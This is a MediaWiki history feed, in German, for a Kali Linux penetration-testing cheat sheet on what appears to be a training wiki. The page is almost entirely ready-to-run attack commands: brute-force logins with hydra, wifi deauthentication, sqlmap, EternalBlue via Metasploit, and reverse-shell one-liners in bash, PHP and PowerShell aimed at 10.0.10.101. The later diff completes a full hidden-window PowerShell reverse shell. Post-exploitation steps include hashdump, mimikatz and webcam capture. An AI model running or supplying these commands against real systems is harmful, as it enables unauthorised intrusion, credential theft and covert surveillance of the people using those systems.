<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="de">
	<id>https://wiki.ixheim.de/index.php?action=history&amp;feed=atom&amp;title=Kali_Cheat_Sheet</id>
	<title>Kali Cheat Sheet - Versionsgeschichte</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.ixheim.de/index.php?action=history&amp;feed=atom&amp;title=Kali_Cheat_Sheet"/>
	<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Kali_Cheat_Sheet&amp;action=history"/>
	<updated>2026-05-15T02:16:40Z</updated>
	<subtitle>Versionsgeschichte dieser Seite in Xinux Wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Kali_Cheat_Sheet&amp;diff=66266&amp;oldid=prev</id>
		<title>Thomas.will: /* System Access &amp; Reverse Shells */</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Kali_Cheat_Sheet&amp;diff=66266&amp;oldid=prev"/>
		<updated>2026-01-18T14:39:04Z</updated>

		<summary type="html">&lt;p&gt;&lt;span dir=&quot;auto&quot;&gt;&lt;span class=&quot;autocomment&quot;&gt;System Access &amp;amp; Reverse Shells&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left diff-editfont-monospace&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;de&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Nächstältere Version&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Version vom 18. Januar 2026, 14:39 Uhr&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l47&quot; &gt;Zeile 47:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Zeile 47:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* python3 exploit.py&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* python3 exploit.py&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* search type:exploit platform:windows&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* search type:exploit platform:windows&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;== System Access &amp;amp; Reverse Shells ==&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;== System Access &amp;amp; Reverse Shells ==&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* nc -lvnp 4444&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* nc -lvnp 4444&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* bash -i &amp;gt;&amp;amp; /dev/tcp/&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;attacker_ip&lt;/del&gt;/4444 0&amp;gt;&amp;amp;1&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* bash -i &amp;gt;&amp;amp; /dev/tcp/&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;10.0.10.101&lt;/ins&gt;/4444 0&amp;gt;&amp;amp;1&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* powershell -nop -c &amp;quot;$client = New-Object System.Net.Sockets.TCPClient('&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;attacker_ip&lt;/del&gt;',4444);&amp;quot;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* powershell -nop &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;-w hidden &lt;/ins&gt;-c &amp;quot;$client = New-Object System.Net.Sockets.TCPClient('&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;10.0.10.101&lt;/ins&gt;',4444);&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2&amp;gt;&amp;amp;1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '&amp;gt; ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()&lt;/ins&gt;&amp;quot;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* socat TCP4-LISTEN:4444,fork EXEC:/bin/bash&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* socat TCP4-LISTEN:4444,fork EXEC:/bin/bash&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* php -r '$sock=fsockopen(&amp;quot;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;attacker_ip&lt;/del&gt;&amp;quot;,4444);exec(&amp;quot;/bin/sh -i &amp;lt;&amp;amp;3 &amp;gt;&amp;amp;3 2&amp;gt;&amp;amp;3&amp;quot;);'&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* php -r '$sock=fsockopen(&amp;quot;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;10.0.10.101&lt;/ins&gt;&amp;quot;,4444);exec(&amp;quot;/bin/sh -i &amp;lt;&amp;amp;3 &amp;gt;&amp;amp;3 2&amp;gt;&amp;amp;3&amp;quot;);'&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;attacker_ip &lt;/del&gt;LPORT=4444 -f exe &amp;gt; shell.exe&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;10.0.10.101 &lt;/ins&gt;LPORT=4444 -f exe &amp;gt; shell.exe&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;== Post-Exploitation ==&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;== Post-Exploitation ==&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;

&lt;!-- diff cache key my_wiki:diff::1.12:old-66265:rev-66266 --&gt;
&lt;/table&gt;</summary>
		<author><name>Thomas.will</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Kali_Cheat_Sheet&amp;diff=66265&amp;oldid=prev</id>
		<title>Thomas.will: Die Seite wurde neu angelegt: „= Kali Linux Cheat Sheet (Penetration Testing) =  == Information Gathering == * nmap -sS -A target.com * whois target.com * theharvester -d target.com -b all *…“</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Kali_Cheat_Sheet&amp;diff=66265&amp;oldid=prev"/>
		<updated>2026-01-18T14:32:03Z</updated>

		<summary type="html">&lt;p&gt;Die Seite wurde neu angelegt: „= Kali Linux Cheat Sheet (Penetration Testing) =  == Information Gathering == * nmap -sS -A target.com * whois target.com * theharvester -d target.com -b all *…“&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Neue Seite&lt;/b&gt;&lt;/p&gt;&lt;div&gt;= Kali Linux Cheat Sheet (Penetration Testing) =&lt;br /&gt;
&lt;br /&gt;
== Information Gathering ==&lt;br /&gt;
* nmap -sS -A target.com&lt;br /&gt;
* whois target.com&lt;br /&gt;
* theharvester -d target.com -b all&lt;br /&gt;
* dnsenum target.com&lt;br /&gt;
* dirb http://target.com/&lt;br /&gt;
* nslookup target.com&lt;br /&gt;
* whatweb http://target.com&lt;br /&gt;
* recon-ng&lt;br /&gt;
&lt;br /&gt;
== Password Attacks ==&lt;br /&gt;
* hydra -l admin -P rockyou.txt target.com http-get&lt;br /&gt;
* john --wordlist=rockyou.txt hash.txt&lt;br /&gt;
* hashcat -m 0 hash.txt rockyou.txt&lt;br /&gt;
* cewl http://target.com -w wordlist.txt&lt;br /&gt;
* crunch 6 10 abcdef1234&lt;br /&gt;
* medusa -h&lt;br /&gt;
* patator ssh_login host=IP user=FILE0 password=FILE1 0=user.txt 1=pass.txt&lt;br /&gt;
&lt;br /&gt;
== Wireless Attacks ==&lt;br /&gt;
* airmon-ng start wlan0&lt;br /&gt;
* airodump-ng wlan0mon&lt;br /&gt;
* aireplay-ng --deauth 10 -a BSSID wlan0mon&lt;br /&gt;
* aircrack-ng -w wordlist.txt capture.cap&lt;br /&gt;
* wash -i wlan0mon&lt;br /&gt;
* reaver -i wlan0mon -b BSSID -vv&lt;br /&gt;
* wifite&lt;br /&gt;
&lt;br /&gt;
== Vulnerability Scanning ==&lt;br /&gt;
* nikto -h http://target.com&lt;br /&gt;
* wpscan --url http://target.com&lt;br /&gt;
* sqlmap -u &amp;quot;http://target.com/page.php?id=1&amp;quot; --dbs&lt;br /&gt;
* searchsploit apache 2.4&lt;br /&gt;
* nuclei -t cves/ -u http://target.com&lt;br /&gt;
* openvas-start&lt;br /&gt;
* lynis audit system&lt;br /&gt;
* gobuster dir -u http://target.com -w wordlist.txt&lt;br /&gt;
&lt;br /&gt;
== Exploitation ==&lt;br /&gt;
* msfconsole&lt;br /&gt;
* use exploit/windows/smb/ms17_010_eternalblue&lt;br /&gt;
* set RHOST target_ip&lt;br /&gt;
* set PAYLOAD windows/meterpreter/reverse_tcp&lt;br /&gt;
* run&lt;br /&gt;
* python3 exploit.py&lt;br /&gt;
* search type:exploit platform:windows&lt;br /&gt;
&lt;br /&gt;
== System Access &amp;amp; Reverse Shells ==&lt;br /&gt;
* nc -lvnp 4444&lt;br /&gt;
* bash -i &amp;gt;&amp;amp; /dev/tcp/attacker_ip/4444 0&amp;gt;&amp;amp;1&lt;br /&gt;
* powershell -nop -c &amp;quot;$client = New-Object System.Net.Sockets.TCPClient('attacker_ip',4444);&amp;quot;&lt;br /&gt;
* socat TCP4-LISTEN:4444,fork EXEC:/bin/bash&lt;br /&gt;
* php -r '$sock=fsockopen(&amp;quot;attacker_ip&amp;quot;,4444);exec(&amp;quot;/bin/sh -i &amp;lt;&amp;amp;3 &amp;gt;&amp;amp;3 2&amp;gt;&amp;amp;3&amp;quot;);'&lt;br /&gt;
* msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe &amp;gt; shell.exe&lt;br /&gt;
&lt;br /&gt;
== Post-Exploitation ==&lt;br /&gt;
* meterpreter &amp;gt; getuid&lt;br /&gt;
* meterpreter &amp;gt; hashdump&lt;br /&gt;
* mimikatz&lt;br /&gt;
* netstat -ano&lt;br /&gt;
* wmic useraccount list brief&lt;br /&gt;
* meterpreter &amp;gt; screenshot&lt;br /&gt;
* meterpreter &amp;gt; webcam_snap&lt;br /&gt;
* ps&lt;/div&gt;</summary>
		<author><name>Thomas.will</name></author>
	</entry>
</feed>